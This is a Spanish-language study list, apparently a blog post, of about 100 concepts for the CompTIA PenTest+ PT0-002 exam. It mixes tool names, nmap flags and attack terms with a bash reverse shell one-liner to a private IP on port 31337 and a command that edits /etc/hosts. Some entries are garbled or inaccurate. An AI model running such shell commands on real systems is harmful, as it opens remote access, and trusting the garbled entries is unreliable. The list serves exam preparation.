Repaso del examen Comptia PenTest PT0–002
3 min readMay 23, 2022
Para sacar tu certificación de Comptia PT0–002, tienes que pagar $$, y no quieres fallar pues tendrias que volver a pagar. Aquí te dejo estos 100 conceptos de seguridad, que te los tienes que saber antes de cojer el examen.
- VLAN HOPPING — Switch Spoffing, double tagging
- Kerberoasting
- DOS Attack
- Buffer Overflow
- Bluejacking
- SQL Injection
- Credential Harvesting
- Tailgating vs Piggybacking
- aireplay -ng -5 -b
- FOCA — Metadata within the document
- RDP Port 3389 — LDAP 389
- Dumspter diving
- (SOW) Statement of Work — Timelines , schedule, Price, Excluded Hosts
- Microsoft Remote Procedure Call(MSRPC) — Enumerate all user accounts
- Karma attack, Evil Twin Attack
- De-Escalation
- Nikto
- OWASZAP — web app scanner
- Nessus
- Systemd — Apple OSX — Persistence Every Reboot
- OSINT(Open Source Intelligence Tools) — Maltego & Shodan
- Mimikatz — Credential Testing Tool
- Steganography — SNOW
- CVSS base score of 10
- Hydra — Used to perform credential brute force attack
- CHCONFIG — Persistence in Linux Service
- Cookie Enumeration — Set “User” cookie = 138298432 (some random 9 digit value)
- dsquery -o -rdn -limit 21 — has not authenticated to the domain in 21 days
- Swagger — API TESTING
- Sticky bits — CHMOD 4111
- BPA for Business Partnership Agreement
- String Slicing
- Biometric device is tuned more toward false positives
- (ICS) Industrial Control System
- Responder — Impersonate Network Resource and collect authentication request.
- Scope Creep
- Sanitize all user input & whitelist approach fro SQL statements.
- Mimikatz — To pull credentials from AD.
- 135,139,445, Which operating system it is?
- Empire- Run powershell agents without requiring the use of powershell.exe
- Cross-site request forgery
- Cross-site scripting
- NTFS Alternate Data Streams
- Which entities would be the proper signing authority penTest, when we are in AWS?
- %40 is the hex symbol for @
- Swagger Document — Rest API equivalent of a WSDL
- Unsecure SUDO vulnerability- /usr/bin/sudo should be 4411 a not 4111
- Metrics — Are a method of measuring something over time
- %27 %27 Translate to two single quote marks
- Wireless Geographic Logging Engine (WiGLE) — wardriving database
- SCAPY — Packet Crafting Tool
- IPV6 Broadcast Address FF02::1
- NAC Bypass
- Cold Boot Attack — or to a lesser extent, a platform reset attack
- NC — NLVP 31337 — bash 1>&/dev/tcp/192.168.1.53/31337 0>&1 —
- Reverse Shell
- Badge cloning — RFID reader hidden in his coat
- Web Application Firewall (WAF)
- echo 127.0.0.1 diontraining.com >> /etc/hosts
- Karma Attack — variant of the evil twin attack.
- Nmap -A
- Nmap -sV
- Nmap -sT
- Nmap -Pn
- Nmap -O
- Nmap -sU
- Nmap -sS
- Nmap -T 1–5
- Nmap -P
- Kismet -Wireless Packet Sniffer
- BASE64 Encoding — Ends with = or == pads
- SET (Social Engineer Toolkit)
- BCP (Business Continuity Plan)
- Sticky MAC — Switch Port MAC Restriction
- MAC FLOODING — Force UNICAST flooding
- Writeable Services — Privilege Escalation
- XCCDF — SCAP Component Extensible Configuration CheckList Description Format
- Nessus — Popular Vulnerability Scanner
- SQL INJECTION (Error, Stacked, Union)
- Burp Suite
- Reflected XSS
- DOM Based XSS
- Parameterized Querys
- Mitre Att&ck Framework
- HTTP Payloads
- IDS — Detect Port Scannning
- Impacket Python
- curl -I example.com- I to tell curl to only fetch the HTTP headers (HEAD method)
- PCI DSS 3.2.1 - Perform internal penetration test at least annually, to comply.
- PCI DSS - Compliance ChekList
- PTES technical guidelines
- Baiting
- Cybersquatting
- MITRE ATT&CK framework
- TTL (Time To Live)
- Drozer
- OpenVas
- DNSSEC
- Fraggle
- Smurf